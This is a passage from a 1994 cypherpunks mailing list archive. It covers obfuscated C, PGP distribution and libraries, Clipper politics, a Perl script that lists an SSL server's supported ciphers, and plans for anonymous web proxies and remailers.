contains the substitution cipher. All the letters of the song are in the 2nd half of the string, starting at '\n'. The substitutions are the first half of the string. The program searches for a match in the index section; when it finds a match, it adds a constant to that character's array index to get the index of the character to print. Thus, searching for '!' causes '\n' to print; searching for 'e' gets 'u'.
This string:

>"@n'+,#'/*{}w+/w#cdnr/+,{}r/*de}+,/*{*+,/w{%+,/w#q#n+,/#{l,+,/n{n+,/+#n+,/#\
>;#q#n+,/+k#;*+,/'r :'d*'3,}{w+K w'K:'+}e#';dq#'l \
>q#'+d'K#!/+k#;q#'r}eKK#}w'r}eKK{nl]'/#;#q#n'){)#}w'){){nl]'/+#n';d}rw' i;# \
>){nl]!/n{n#'; r{#w'r nc{nl]'/#{l,+'K {rw' iK{;[{nl]'/w#q#n'wk nw' \
>iwk{KK{nl]!/w{%'l##w#' i; :{nl]'/*{q#'ld;r#n'}{nlwb!/*de}'c \
>;;{nl'-{}rw]'/+,}##'*}#nc,',#nw]'/+kd'+e}+;#'rdq#w! nr'/ ') }+}{rl#'{n' ')# \
>}'+}##(!!/"

is the phrases of the song. Each '/' character is the end of a phrase: "@n'+,#'" == "On the "; "*{}w+" == "first"; "w#cdnr" == "second"; etc.

The rest of the program is a selector to choose which phrase to print next. It doesn't run everywhere (it presumes its character set is 7-bit ASCII), and it depends on being invoked with no arguments. (Try it with one or two arguments -- see what happens! It redefines the standard main() argument 'argv' as an integer purely so that it can be 100% recursive, and depends on 'argc' being zero in the outermost level.) It's one busy s.o.b., too, because _every_ increment of the lookup index is a separate function call, as is the phrase selector and character printer.

I gather that this was one of the entries in the "obfuscated 'C'" programming contests that used to be held some years ago. (Are they still held?)

-- Elton

From jthomas at access.digex.net Mon Dec 19 18:44:47 1994
From: jthomas at access.digex.net (Joe Thomas)
Date: Mon, 19 Dec 94 18:44:47 PST
Subject: Physical location of a machine
In-Reply-To: <9412200047.AA19020@oss.stir.ac.uk>
Message-ID:

On Tue, 20 Dec 1994, Jonathon Fletcher wrote:

> >From David Harvey's list of places holding pgp outside the us:
>
> ftp://ftp.uu.net/pub/security/virus/crypt/pgp
>
> where, physically, is this machine (country).

I think it's physically in the US, about 10 miles west of me down Route 50 in Falls Church, Virginia. Anyone at UUNET, please correct me if I'm wrong...
Joe

From nobody at jpunix.com Mon Dec 19 19:09:28 1994
From: nobody at jpunix.com (Anonymous)
Date: Mon, 19 Dec 94 19:09:28 PST
Subject: No Subject
Message-ID: <199412200308.VAA03397@jpunix.com>

Perry, shut up already! What a fuckin' geek...

From Tony.Gurnick at nzdairy.co.nz Mon Dec 19 19:25:24 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Mon, 19 Dec 94 19:25:24 PST
Subject: C code contest
Message-ID: <94122016230448@nzdairy.co.nz>

Elton at sybase.com wrote:

>I gather that this was one of the entries in the "obfuscated 'C'"
>programming contests that used to be held some years ago.
>(Are they still held?)

Yep, Mail chongo at TOAD.COM, coincidentally

T

From fain at tyto.etho.caltech.edu Mon Dec 19 21:55:00 1994
From: fain at tyto.etho.caltech.edu (Dan Fain)
Date: Mon, 19 Dec 94 21:55:00 PST
Subject: hiding strings in binaries
In-Reply-To: <9412200231.AA04630@fnord.sybgate.sybase.com>
Message-ID:

> I gather that this was one of the entries in the "obfuscated 'C'"
> programming contests that used to be held some years ago. (Are they
> still held?)

I don't know if they're still held, but for a history of the contest from 1984-1991, see Libes, Don. _Obfuscated C and Other Mysteries_. New York: Wiley, 1993. Many of the programs use Rot-13 encryption. The book describes some generally applicable principles of obfuscation. A "Twelve Days of Christmas" program was the winner of the 1988 "Least Likely to Compile Successfully" award.

Dan Fain
Caltech

From jamesd at netcom.com Mon Dec 19 21:58:20 1994
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 19 Dec 94 21:58:20 PST
Subject: (fwd) Newt says Clipper Chip is Dead
In-Reply-To:
Message-ID:

James A. Donald wrote:
> > On his weekly call-in TV show on National Empowerment Television tonight,
> > Newt received a call asking about his opinion on the Clipper Chip, and he
> > replied that it was a moot point, in that the Clipper chip concept was
> > designed for a condition that no longer exists.
Jonathan Rochkind wrote:
> Eh? What condition is that? I don't understand.

A true politician never has one clear meaning.

My interpretation is that he is saying that the stable door is open and the horse has already bolted -- that it is now impossible to prevent people from communicating secretly if they wish, except by totalitarian measures.

He has sometimes said stuff that echoes TCMay -- that the revolution in communications will transform society and undermine the power of government.

Of course now that he is on the inside, rather than the outside, he may change his attitude to this coming revolution.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we      James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.          jamesd at netcom.com

From jamesd at netcom.com Mon Dec 19 22:10:37 1994
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 19 Dec 94 22:10:37 PST
Subject: freedom+diversity=noise
In-Reply-To: <199412192215.RAA04833@october.ducktown.org>
Message-ID:

On Mon, 19 Dec 1994 mkj at october.ducktown.org wrote:
> FREEDOM + DIVERSITY = NOISE
>
> Where "noise" is defined as any behavior(s) which a significant
> portion of the group finds undesirable.

The problem is not freedom and diversity, but assholes.

Those who did the most for freedom, got the pants flamed off them. Namely TC May, and Netscape.

Tim was flamed for not having the latest and greatest hardware -- thereby allegedly holding back the revolution, though his hardware and software is typical of 99% of the net, as I determined by looking at the way in which binaries are posted.

Netscape was flamed because the first encryption that they implemented was not in accord with cypherpunk priorities (It was in accord with commercial priorities, as it should be.)
---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we      James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.          jamesd at netcom.com

From lcottrell at popmail.ucsd.edu Mon Dec 19 22:14:22 1994
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Mon, 19 Dec 94 22:14:22 PST
Subject: c'punks top 5
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>Adam Shostack writes:
>> What's wrong with PGPtools? (A lack of documentation. Been
>> a while since I looked, but I think it lacked a high level
>> interface. The low level stuff is great, but on the mac, I can
>> send an Appleevent "Encrypt *file recipient" and, some extended
>> period later, get a response.
>
>It has been a while since I looked too, does it work with the 'new' format
>messages generated by MIT pgp? Does anyone actually USE pgptools for any
>available applications? As far as I know, nobody uses it. If nobody uses
>PGPtools, then what is the reason? Either nobody really wants a PGP library
>(which isn't true judging from the inquiries on cypherpunks), or something is
>wrong with PGPTools. Is it the documentation like you said? Maybe some of
>us should pick up where pr0duct cypher left off and enhance PGPTools. This
>brings me to another point:
>

I use PGPTools. It is the crypto engine for Mixmaster. I have been having problems with it though. It works fine with PGP2.6 messages.

>
>andrew

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server.
Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche

From hfinney at shell.portal.com Mon Dec 19 22:25:03 1994
From: hfinney at shell.portal.com (Hal)
Date: Mon, 19 Dec 94 22:25:03 PST
Subject: SSL server experiment
Message-ID: <199412200623.WAA11611@jobe.shell.portal.com>

Here is a perl script which connects to a netscape-style "https" server. The results of running it with "https.pl home1.mcom.com 443" is:

Attempting connection to 198.93.93.10
Connected
Sent message, length 40
Received length = 502
Message type = 4
Session ID Hit flag = 0
Certificate type = 1
Server version = 2
Certificate length = 472
Cipher specs length = 3
Conn ID length = 16
Supported ciphers:
	RC4_EXPORT40, 128 bits

This way you can see which of the 5 cipher options (RC4 or RC2 in full and export versions, plus IDEA) are supported by any given server. You always use port 443 and just specify the machine name.

I was a little surprised that Netscape's own server is only running the 40 bit version. I hope the export restrictions will not prevent the use of full strength ciphers.
Here is the script, which I call https.pl:

#!/usr/local/bin/perl
# Perl script to test connection to http ssl port
# Usage: https machine port

# Standard internet stuff
$AF_INET = 2;
$SOCK_STREAM = 1;
($name, $aliases, $proto) = getprotobyname('tcp');
$sockaddr = 'S n a4 x8';

# Parse
if (@ARGV == 2) {
    ($them, $port) = @ARGV;
} else {
    die "Usage: $0 machine port\n";
}

select (S); $| = 1; select (STDOUT);

socket (S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!";
($name, $aliases, $type, $len, $thataddr) = gethostbyname($them);
$that = pack ($sockaddr, $AF_INET, $port, $thataddr);
@thataddr = unpack('C4', $thataddr);
$thataddr = join('.', @thataddr);
print "Attempting connection to $thataddr\n";
die $! unless connect (S, $that);
print "Connected\n";

$cli_hello = 1;
$vers = 2;
$msg = pack ("C n4", $cli_hello, $vers, 5*3, 0, 16);
$challenge = pack ("d2", rand, rand); #16 bytes
$cspecs = pack ("Cn"x5, 1, 128, 2, 128, 3, 128, 4, 128, 5, 128);
$len = 1+8+5*3+0+16 + 32768;
$h = pack("n", $len);
$totmsg = pack("a2 a9 a15 a16", $h, $msg, $cspecs, $challenge);
print S $totmsg;
print "Sent message, length ", $len-32768, "\n";

# Now for the interesting part
read (S, $phd, 2);
($slen) = unpack ("n", $phd);
print "Received length = ", $slen-32768, "\n";
read (S, $pm1, 11);
($smsg, $ssess, $scert, $sver, $sclen, $scspeclen, $scidlen) =
    unpack ("C3 n4", $pm1);
print "Message type = $smsg\n";
print "Session ID Hit flag = $ssess\n";
print "Certificate type = $scert\n";
print "Server version = $sver\n";
print "Certificate length = $sclen\n";
print "Cipher specs length = $scspeclen\n";
print "Conn ID length = $scidlen\n";
if ($sclen) {
    read (S, $scert, $sclen);
}
read (S, $pspecs, $scspeclen);
$nscspecs = $scspeclen / 3;
@scspecs = unpack ("Cn" x $nscspecs, $pspecs);
@ciphernames = (
    "(undefined)",
    "RC4",
    "RC4_EXPORT40",
    "RC2",
    "RC2_EXPORT40",
    "IDEA"
);
print "Supported ciphers:\n";
for ($i=0; $i<$nscspecs; ++$i) {
    printf ("\t%s, %d bits\n", @ciphernames[@scspecs[2*$i]],
        @scspecs[2*$i+1]);
}
read (S, $scid, $scidlen);
close S;
exit 0;

From warrior at infinet.com Mon Dec 19 23:48:29 1994
From: warrior at infinet.com (Warrior)
Date: Mon, 19 Dec 94 23:48:29 PST
Subject: Physical location of a machine
In-Reply-To: <9412200047.AA19020@oss.stir.ac.uk>
Message-ID:

ftp.uu.net (US)? mirrors ftp.win.tue.nl (Netherlands) which mirrors ftp.informatik.uni-hamburg.de (Germany). I think. Europeans would probably use the last two so they don't import from America. Also, ftp.win.tue.nl is faster as the uni-hamburg source is a great source for crypto, but only allows 5 users at a time.

Dave

On Tue, 20 Dec 1994, Jonathon Fletcher wrote:

> >From David Harvey's list of places holding pgp outside the us:
> ftp://ftp.uu.net/pub/security/virus/crypt/pgp
> where, physically, is this machine (country).
>
> -Jon

___
/\ PGP the Cutting Edge of Privacy.
/vvvvvvvvvvvv \-----------------------------------\
| WARRIOR ( | PGP Key Id 0XC554E447D > Magnus Frater Videt Tu
`^^^^^^^^^^^^ /===================================/
\/ Finger for PGP 2.6.2 public Key.
PGP Fingerprint 15 99 09 6D 11 C8 7C E0 08 C7 E6 95 46 65 FE F0
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
| Dave M. Harvey                     warrior at infinet.com|
| PO Box 151311         dharvey at freenet.columbus.oh.us|
| Columbus, OH 43215-8311      fm063 at cleveland.freenet.edu|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From lcottrell at popmail.ucsd.edu Tue Dec 20 00:06:45 1994
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Tue, 20 Dec 94 00:06:45 PST
Subject: Mac PGPTools
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I have a Magic Money client for the Mac, so PGPTools MUST have been ported to the Mac. Does anyone know where I might find the source for Mac PGPTools? I am starting to think about porting the Mixmaster front end to the Mac.

Thanks.
-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server.
Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche

From skaplin at skypoint.com Tue Dec 20 00:17:13 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Tue, 20 Dec 94 00:17:13 PST
Subject: scripts, recipes and things of that ilk
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Has anyone put together a compilation of all the perl and procmail scripts for integrating PGP into various mail readers? If so could you please forward a copy to me.

Thanks,

Sam

==============================================================================
Bore, n: a person who talks when you wish him to listen.
- Ambrose Bierce, "The Devil's Dictionary" 1911
==============================================================================
skaplin at skypoint.com                   | "...vidi vici veni" - Overheard
                                          | outside a Roman brothel.
PGP encrypted mail is accepted and        |
preferred.                                | Change is the only constant in the
                                          | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or   |
Finger skaplin at mirage.skypoint.com     | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender
-----END PGP SIGNATURE-----

From skaplin at skypoint.com Tue Dec 20 00:17:19 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Tue, 20 Dec 94 00:17:19 PST
Subject: Any suggestions for additions to this? (revised)
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Any suggestions or additions to this list? All of the files are now in place. Please let me know if you encounter any problems with the responder!

Thanks,

Sam

- --------------------------------------------------------------------------
This is the index for Sam Kaplin's Auto-Responder.

To get a file: Send a message to: skaplin at c2.org
The subject of the message MUST BE: SEND FILE [file_name]

EXAMPLE: Subject: SEND FILE help <----Case Sensitive!!!

All binary files are UUENCODED with PGP signatures. Please address all comments or problems to skaplin at skypoint.com. If you receive a blank message back, then the file you requested does not exist. Should you have a crypto related file that you would like added, contact me at: skaplin at skypoint.com. Please note that I am subject to the petty whims of the U.S. government, so I will not add any files which may be subject to ITAR.
- --------------------------------------------------------------------------
File Name       Description
- --------------------------------------------------------------------------
apgp212_1.uue   Autopgp 2.12 offline mail packet processor.
                Automates PGP functions. Part 1 of 4
apgp212_2.uue   Autopgp 2.12 offline mail packet processor.
                Automates PGP functions. Part 2 of 4
apgp212_3.uue   Autopgp 2.12 offline mail packet processor.
                Automates PGP functions. Part 3 of 4
apgp212_4.uue   Autopgp 2.12 offline mail packet processor.
                Automates PGP functions. Part 4 of 4
apgp22b2_1.uue  Autopgp 2.2b2 offline mail packet processor.
                Automates PGP functions. Part 1 of 4 BETA
apgp22b2_2.uue  Autopgp 2.2b2 offline mail packet processor.
                Automates PGP functions. Part 2 of 4 BETA
apgp22b2_3.uue  Autopgp 2.2b2 offline mail packet processor.
                Automates PGP functions. Part 3 of 4 BETA
apgp22b2_4.uue  Autopgp 2.2b2 offline mail packet processor.
                Automates PGP functions. Part 4 of 4 BETA
cp-faq1.uue     Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 1 of 11
cp-faq2.uue     Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 2 of 11
cp-faq3.uue     Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 3 of 11
cp-faq4.uue     Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 4 of 11
cp-faq5.uue     Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 5 of 11
cp-faq6.uue     Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 6 of 11
cp-faq7.uue     Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 7 of 11
cp-faq8.uue     Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 8 of 11
cp-faq9.uue     Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 9 of 11
cp-faq10.uue    Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 10 of 11
cp-faq11.uue    Tim May's Cypherpunk Faq - Everything you wanted to
                know about C'Punk issues, but were afraid to ask.
                Part 11 of 11
help            This file.
key             Sam Kaplin's PGP Public keys.
pgpfaq1.uue     Frequently asked questions about PGP. Part 1 of 2
pgpfaq2.uue     Frequently asked questions about PGP. Part 2 of 2
wherefaq        Where to obtain PGP.
yn075_1.uue     YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 1 of 14
yn075_2.uue     YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 2 of 14
yn075_3.uue     YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 3 of 14
yn075_4.uue     YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 4 of 14
yn075_5.uue     YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 5 of 14
yn075_6.uue     YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 6 of 14
yn075_7.uue     YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 7 of 14
yn075_8.uue     YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 8 of 14
yn075_9.uue     YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 9 of 14
yn075_10.uue    YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 10 of 14
yn075_11.uue    YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 11 of 14
yn075_12.uue    YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 12 of 14
yn075_13.uue    YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 13 of 14
yn075_14.uue    YARN .075 offline mail reader. Minimally supports
                PGP internally. Part 14 of 14

==============================================================================
School days, I believe, are the unhappiest in the whole span of human existence. They are full of dull, unintelligible tasks, new and unpleasant ordinances, with brutal violations of common sense and common decency.
--H. L.
Mencken--
==============================================================================
skaplin at skypoint.com                   | "...vidi vici veni" - Overheard
                                          | outside a Roman brothel.
PGP encrypted mail is accepted and        |
preferred.                                | Change is the only constant in the
                                          | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or   |
Finger skaplin at mirage.skypoint.com     | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender
-----END PGP SIGNATURE-----

From ddt at lsd.com Tue Dec 20 01:28:15 1994
From: ddt at lsd.com (Dave Del Torto)
Date: Tue, 20 Dec 94 01:28:15 PST
Subject: Callback phones
Message-ID:

At 10:19 am 12/10/94, Ben wrote:
>I picked this up on the alt.2600 newsgroup. Seems like it could be used
>for things like privacy enhancement if it was coupled with a credit
>card/cashier's check that wasn't in your name along with perhaps a call
>back loop.
>
>Ben.

FYI:

----- The following addresses had delivery problems -----
(unrecoverable error)

----- Transcript of session follows -----
... while talking to halcyon.halcyon.com.:
>>> RCPT To:
<<< 550 ... User unknown
550 ... User unknown

From mark at unicorn.com Tue Dec 20 05:06:00 1994
From: mark at unicorn.com (Mark Grant)
Date: Tue, 20 Dec 94 05:06:00 PST
Subject: PGP Tools
Message-ID:

On Mon, 19 Dec 1994, Andrew Lowenstern wrote:

> It has been a while since I looked too, does it work with the 'new' format
> messages generated by MIT pgp?

I don't think it does by default, but you can just change the code that looks for a version number to accept version 2 or 3. Works for me...

> Does anyone actually USE pgptools for any
> available applications? As far as I know, nobody uses it.

Magic Money
Privtool
Mixmaster

Dunno about anything else....

> Either nobody really wants a PGP library
> (which isn't true judging from the inquiries on cypherpunks), or something is
> wrong with PGPTools. Is it the documentation like you said? Maybe some of
> us should pick up where pr0duct cypher left off and enhance PGPTools.

I'd say there are three problems, firstly there's very little documentation, which isn't a problem for those of us who can read and understand the source code, but could be for more general use, secondly it's not entirely legal in the US (patents, etc) and not widely available outside (there are some versions on ftp.dsi.unimi.it, but you have to actually go looking for it if you want to find it). The other problem is that the interface is very low-level, which makes it difficult to just take a standard PGP message and decrypt it in your program.

You can get around the latter by using pgplib.c from Privtool (it's been released under the GPL), however it's only really been tested on Suns at this point and may need a bit of hacking - if you port it to other machines please mail me any bugfixes. It also has some potential security problems, for example there are lots of places where it should probably zero the memory that's been used but doesn't (I've fixed most of those in my own copy). But otherwise it's a pretty good product and I'm surprised that more people don't use it.

There also appears to be a bug in pgpk_findkey() such that it only looks at the first id on each key, so if you request a key by another id it fails to find it. Does anyone know if Pr0duct Cypher is still updating PGP Tools, or should I look at fixing this instead ?

Mark

From perry at imsi.com Tue Dec 20 05:13:14 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 20 Dec 94 05:13:14 PST
Subject: No Subject
In-Reply-To: <199412200308.VAA03397@jpunix.com>
Message-ID: <9412201312.AA10014@snark.imsi.com>

Anonymous says:
> Perry, shut up already! What a fuckin' geek...

Ah, my fans. Nothing is as big an ego boost, you realize, as a contentless anonymous denunciation...

Perry

From danisch at ira.uka.de Tue Dec 20 05:31:27 1994
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Tue, 20 Dec 94 05:31:27 PST
Subject: Pgp in Europe
Message-ID: <9412201326.AA10076@elysion.iaks.ira.uka.de>

> As long as _Swedish_ law doesn't bar you from importing strong cryptography
> into Sweden, you can grab PGP from wherever you like.

But after access to a ftp-server inside of the states he never should go to America personally, I guess...

Hadmut

From nsb at nsb.fv.com Tue Dec 20 09:22:05 1994
From: nsb at nsb.fv.com (Nathaniel Borenstein)
Date: Tue, 20 Dec 94 09:22:05 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <4946.787881649.1@nsb.fv.com>
Message-ID:

Excerpts from junk.interesting: 19-Dec-94 Re: McCoy is Right! New Mai.. wcs at anchor.ho.att.com (616)

> If there were a convenient MIME viewer to pop in as my PAGER,
> I might have mail use it rather than less -sc, my current preference.

This is precisely what metamail is for. It's in ftp://thumper.bellcore.com/pub/nsb/mm2.7.tar.Z.

From entropy at IntNet.net Tue Dec 20 11:22:50 1994
From: entropy at IntNet.net (Jonathan Cooper)
Date: Tue, 20 Dec 94 11:22:50 PST
Subject: c'punks top 5
In-Reply-To: <9412200043.AA19009@oss.stir.ac.uk>
Message-ID:

> > 1. anonymous http proxy servers ("re-webbers")
>
> What is wanted/meant for these ?

A proxy server for HTTP transport so that one could access the web anonymously. I don't think coding is the problem here; one could be easily hacked out in perl, or you could use CERN HTTPD as a proxy server.
I think the problem is finding someone who will offer up their machine as a place to run this service.

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 )

From nsb at nsb.fv.com Tue Dec 20 12:24:27 1994
From: nsb at nsb.fv.com (Nathaniel Borenstein)
Date: Tue, 20 Dec 94 12:24:27 PST
Subject: PGP-MIME spec (No Flames Allowed!)
In-Reply-To: <18602.787867142.1@nsb.fv.com>
Message-ID:

Excerpts from radiomail-dups: 19-Dec-94 PGP-MIME spec (No Flames Al.. "JEFF LICQUIA @mhc.uiuc. (1794*)

> I've noticed Mr. Borenstein's presence here in cypherpunks; I invite him
> to clarify or update as needed.

I think you stated it pretty well. I think we now have someone who has stepped forward to write the new MIME-PGP draft, in consultation with Phil Zimmermann and myself. (I won't name him in public, since he may prefer to keep a low profile for now.) I'm sure that when the draft is ready, its existence will be announced on cypherpunks.

-- Nathaniel

From adam at bwh.harvard.edu Tue Dec 20 12:31:57 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Tue, 20 Dec 94 12:31:57 PST
Subject: c'punks top 5
In-Reply-To:
Message-ID: <199412202030.PAA11794@bwh.harvard.edu>

Jonathan Cooper wrote:
| > > 1. anonymous http proxy servers ("re-webbers")
| >
| > What is wanted/meant for these ?
|
| A proxy server for HTTP transport so that one could access the web
| anonymously. I don't think coding is the problem here; one could be
| easily hacked out in perl, or you could use CERN HTTPD as a proxy
| server. I think the problem is finding someone who will offer up their
| machine as a place to run this service.

It might also be nice to encrypt the connection from client to proxy. Otherwise, this service only protects you from the server knowing who you are.
If you add encryption, then it begins to offer anonymity against people watching the proxy. (Assuming there are multiple connections to the proxy.)

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From andrew_loewenstern at il.us.swissbank.com Tue Dec 20 12:46:07 1994
From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern)
Date: Tue, 20 Dec 94 12:46:07 PST
Subject: c'punks top 5
Message-ID: <9412202044.AA03402@ch1d157nwk>

> A proxy server for HTTP transport so that one could access the
> web anonymously. I don't think coding is the problem here; one
> could be easily hacked out in perl, or you could use CERN HTTPD as
> a proxy server. I think the problem is finding someone who will
> offer up their machine as a place to run this service.

It could be run from any user account, like a remailer... The only problem there is getting it to start up after the machine has rebooted, etc. I suppose a procmail recipe or some other .forward magic could be set up so a simple e-mail message to the proxy operator account would start the server if it wasn't running.

I would think that running an anonymous HTTP proxy server is much less likely to bring people screaming to your sysadmin than an anonymous remailer. Thus there is a chance that there could be more people willing to put up the service than even remailers... However, while there may be less chance of forceful shutdown due to complaints, an anon-http proxy server would probably consume much more in the way of network resources than a remailer, which will likely lead to many being shutdown once discovered by the sysadmins (although, maybe not).

andrew

From perry at imsi.com Tue Dec 20 12:55:04 1994
From: perry at imsi.com (Perry E.
Metzger)
Date: Tue, 20 Dec 94 12:55:04 PST
Subject: c'punks top 5
In-Reply-To: <9412202044.AA03402@ch1d157nwk>
Message-ID: <9412202053.AA10926@snark.imsi.com>

Andrew Lowenstern says:
> > A proxy server for HTTP transport so that one could access the
> > web anonymously.
>
> It could be run from any user account, like a remailer...

I'd say run socks or something similar; it's a generalized port proxying facility for firewalls, but it should work fine for this.

.pm

From skaplin at skypoint.com Tue Dec 20 12:55:10 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Tue, 20 Dec 94 12:55:10 PST
Subject: Guerrilla remailers revisited
Message-ID: <1NpzkKjqR4IK075yn@skypoint.com>

-----BEGIN PGP SIGNED MESSAGE-----

This idea was buried in the "Rae" thread and I thought it deserved a life of its own. As we have found out, the freenets use an interface called "FREEPORT." To myself and many others this software is a mystery. I am wondering if it is possible to call procmail via a .forward file under Freeport. If this is possible, why couldn't someone write a .procmailrc file to sanitize the headers. If this was written properly, all you should have to do is drop procmail, the .procmailrc file and the .forward file in place and the remailer is up and running. The key here is will freeport call procmail through a .forward file (or some reasonable facsimile.)

The downside is I only have one account which I am able to run procmail on. This account is presently acting as a forwarding mechanism for pgp-public-keys at c2.org and my auto-responder. Because of this I can't write and debug the recipe.

Happy Holidays,

Sam

==============================================================================
Lawyer.....One who protects us against robbery by taking away the temptation.
--H. L Mencken--
==============================================================================
skaplin at skypoint.com                   | "...vidi vici veni" - Overheard
                                        | outside a Roman brothel.
PGP encrypted mail is accepted and      |
preferred.                              | Change is the only constant in the
                                        | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com   | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender
-----END PGP SIGNATURE-----

From sameer at c2.org Tue Dec 20 13:00:56 1994
From: sameer at c2.org (sameer)
Date: Tue, 20 Dec 94 13:00:56 PST
Subject: c'punks top 5
In-Reply-To: <199412202030.PAA11794@bwh.harvard.edu>
Message-ID: <199412202056.MAA21946@infinity.c2.org>

>
> It might also be nice to encrypt the connection from client to
> proxy. Otherwise, this service only protects you from the server
> knowing who you are. If you add encryption, then it begins to offer
> anonymity against people watching the proxy. (Assuming there are
> multiple connections to the proxy.)
>

If c2.org grew enough to warrant a fractional T1, it would certainly be willing to run such a service, with prolly swIPed or skronked connections between the client and proxy..
The barriers to me setting it up are:

A) Digital postage
B) Bandwidth on c2.org (only 14.4 right now)

--
sameer                                  Voice:   510-841-2014
Network Administrator                   Pager:   510-321-1014
Community ConneXion: The NEXUS-Berkeley Dialin:  510-549-1383
http://www.c2.org (or login as "guest")          sameer at c2.org

From jrochkin at cs.oberlin.edu Tue Dec 20 13:10:33 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 20 Dec 94 13:10:33 PST
Subject: c'punks top 5
Message-ID:

At 3:30 PM 12/20/94, Adam Shostack wrote:
[> someone else I've lost wrote:]
>| A proxy server for HTTP transport so that one could access the web
>| anonymously. I don't think coding is the problem here; one could be
>| easily hacked out in perl, or you could use CERN HTTPD as a proxy
>| server. I think the problem is finding someone who will offer up their
>| machine as a place to run this service.
>
> It might also be nice to encrypt the connection from client to
>proxy. Otherwise, this service only protects you from the server
>knowing who you are. If you add encryption, then it begins to offer
>anonymity against people watching the proxy. (Assuming there are
>multiple connections to the proxy.)
>
>Adam

Yeah, and ideally the software would allow "chaining" through several anon-proxy-servers, similar to what you can do with the remailers. I think that would give you just about the most security you could expect from such a set-up.

From hfinney at shell.portal.com Tue Dec 20 13:36:00 1994
From: hfinney at shell.portal.com (Hal)
Date: Tue, 20 Dec 94 13:36:00 PST
Subject: HTTP redirectors
